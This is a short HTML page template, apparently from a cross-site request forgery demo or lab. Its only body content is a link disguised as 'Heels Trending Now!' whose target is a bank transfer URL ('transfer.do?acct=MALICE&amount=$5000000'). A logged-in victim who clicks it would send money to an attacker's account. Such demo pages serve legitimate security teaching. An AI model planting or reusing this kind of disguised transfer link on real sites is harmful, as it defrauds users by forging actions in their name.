{{template "header"}}
{{template "assist"}}
<div div class="container text-black">
    <a href="http://edbank.com/transfer.do?acct=MALICE&amount=$5000000">Heels Trending Now!</a>
</div>
{{template "home"}}
{{template "footer"}}